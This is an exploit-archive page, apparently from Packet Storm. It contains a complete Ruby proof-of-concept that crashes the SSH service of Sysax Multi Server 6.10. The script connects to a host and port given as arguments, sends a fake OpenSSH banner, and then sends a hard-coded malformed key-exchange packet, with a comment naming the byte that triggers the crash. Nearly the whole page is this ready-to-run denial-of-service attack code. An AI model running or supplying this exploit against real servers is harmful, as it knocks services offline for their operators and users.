Sysax Multi Server version 6.10 suffers from an SSH denial of service vulnerability.
50cbbd9b67f7808e61c6265a8082071e7d09c673279aac4a56165ac92bd9fc96#!/usr/bin/env ruby
# Sysax Multi Server 6.10 SSH DoS
# Matt "hostess" Andreko < mandreko [at] accuvant.com >
# http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html
require 'socket'
unless ARGV.length == 2
puts "Usage: ruby #{$0} [host] [port]\n"
exit
end
packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
#3rd byte in this next line causes crash
0x00, 0x00, 0x28, 0x7a, 0x6c, 0x69, 0x62, 0x40,
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*")
host = ARGV[0]
port = ARGV[1]
sock = TCPSocket.open(host, port)
banner = sock.gets()
puts banner
sock.puts("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n")
sock.puts(packet)
resp = sock.gets()
sock.close()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed